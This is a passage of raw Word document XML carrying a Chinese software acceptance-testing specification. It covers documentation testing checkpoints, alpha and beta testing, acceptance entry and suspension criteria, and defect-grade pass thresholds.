    <w:p w14:paraId="35AB60B6"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测试对象：系统提交给用户的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A23920"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目标：验证用户文档是正确的并且保证操作手册的过程能正确工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77650E4B"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lastRenderedPageBreak/>
        <w:t>优点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE25A57"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（1）有助于发现系统中的不足，并使系统更可用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0A8A0"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（2）减少客户支持成本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749D143"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检查点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDD4A0"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（1）确切按照文档所描述的方法使用系统；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002DD6F"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（2）测试每个提示和建议；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5C6F7"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（3）测试每个在线帮助的超链接；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DEAAD4"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（4）测试每条语句；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C4A3A"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（5）检查所有的错误信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC86A4A"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（6）测试文档中的每个样例；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA25CD8"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（7）保证所有的索引入口有文档文本；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD09AA4"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（8）保证文档覆盖所有用户关键功能；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC96D0E"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（9）保证阅读类型不太技术话；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16698615"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（10）文档测试的缺陷也并入缺陷跟踪库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69499EDB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="464" w:name="_Toc258175811"/>
      <w:bookmarkStart w:id="465" w:name="_Toc36488003"/>
      <w:r w:rsidRPr="00536672">
        <w:t>α，β版本测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="48601F7C"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ab/>
        <w:t>α测试是指软件开发公司组织内部人员模拟各类用户行对即将交付软件产品（称为α版本）进行测试，试图发现错误并修正。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4AF6A"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>经过α测试调整的软件产品称为β版本。紧随其后的β测试是指软件开发公司组织各方面的典型用户在日常工作中实际使用β版本，并要求用户报告异常情况、提出批评意见。然后软件开发公司再对β版本进行改错和完善。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA4768" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc36488004"/>
      <w:bookmarkStart w:id="467" w:name="_Toc36573269"/>
      <w:bookmarkStart w:id="468" w:name="_Toc36630355"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>验收测试准入条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
      <w:bookmarkEnd w:id="467"/>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w14:paraId="58C228B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc36488005"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="2BA0B658"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a) 验收版本的需求文档（提交方提供）：要求需求文档与最终提交验收测试的程序完全匹配 ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F801AD8"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b) 验收版本的测试用例（提交方提供）：要求测试案例覆盖最终版本的需求文档；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092B840"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c) 验收版本的测试</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>报</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>告（提交方提供）：在测试报告书中说明测试总体情况，缺陷列表及修复情况；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B31252"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) 验收版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户手册</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（提交方提供）：在</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户手册</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>中说明</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>产品安装、部署、功能使用、注意事项等</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>情况；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD28791" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="_Toc36488006"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺陷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w14:paraId="66A7985B"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要求开发方在合同双方约定的环境中对需要文档上提及的所有功能进行全面测试，且提交验收测试时，开发方发现的所有缺陷都已解决。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CD8F0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="_Toc36488007"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w14:paraId="246B4F06"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验收测试环境准备完成，与线上真实环境一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C358DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="_Toc36488008"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沟通和联系</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w14:paraId="383525A0"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1. 提交验收测试的开发方负责人联系方式及测试工程师联系方式齐全 ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F130F5"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2. 提交验收测试缺陷的沟通渠道建立完毕，要求快捷、准确、反馈及时 ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F00BEE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="473" w:name="_Toc36488009"/>
      <w:bookmarkStart w:id="474" w:name="_Toc36573270"/>
      <w:bookmarkStart w:id="475" w:name="_Toc36630356"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
      <w:bookmarkEnd w:id="474"/>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="68069D00" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc36488010"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档验收</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w14:paraId="60C1E649"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lastRenderedPageBreak/>
        <w:t>进入标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC5DD5"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文档准备必须齐全且符合标准，可以进入文档验收流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349869A7"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中断标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A0B20"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1. 需求文档并非最终版，需求文档上描述的功能程序并未实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029B433"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2. 测试用例与需求文档不匹配，测试用例中测试的模块在需求文档中不存在或者需求文档中的功能模块未在测试用例中体现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2DFBF"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3. 测试报告书不完整，遗留缺陷不符合遗留缺陷允许限制的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E6658"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退出标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76293481"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文档符合标准并通过验收，进入程序验收流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0207E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc36488011"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序功能验收</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w14:paraId="3C7B3D58"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进入标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED1BF4"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文档验收流程结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49564851"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中断标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E211BC1"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1. 出现 A，B级缺陷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273263CD"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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C级缺陷达到</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B7B26"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3. 验收测试过程中，提交新的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46204C2D"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退出标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60173F59"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验收测试合格，缺陷按照标准修复完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E633D6"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通过标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F9844"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要求验收测试结束后，未解决的缺陷达到以下要求时，才能验收通过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06616EE7"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a) A级缺陷：0个；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E853AE"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lastRenderedPageBreak/>
        <w:t>b) B级缺陷：0个；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF2A28"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c) C级缺陷：小于等于总缺陷数的3%；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61023E"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d) D级缺陷：小于等于总缺陷数的5%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FE9D3"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e) E级缺陷：小于等于总缺陷数的15%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA33AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注：对于放弃处理的提案，必须提前经过我方同意。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD163E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="_Toc36488012"/>
      <w:bookmarkStart w:id="479" w:name="_Toc36573271"/>
      <w:bookmarkStart w:id="480" w:name="_Toc36630357"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收完成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
      <w:bookmarkEnd w:id="479"/>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w14:paraId="7B4B0A4F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc36488013"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收完成后提交的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="08D764F9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版需求</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A496A11" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b) 提交方提供的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76DE32" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c) 提交方提供的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54372411" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交方提供的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F7C69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc36488014"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收完成后提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w14:paraId="6A04B8FC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验收完成锁定的程序最终版本。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:sectPr w:rsidR="00C55A9C" w:rsidRPr="003914A3">
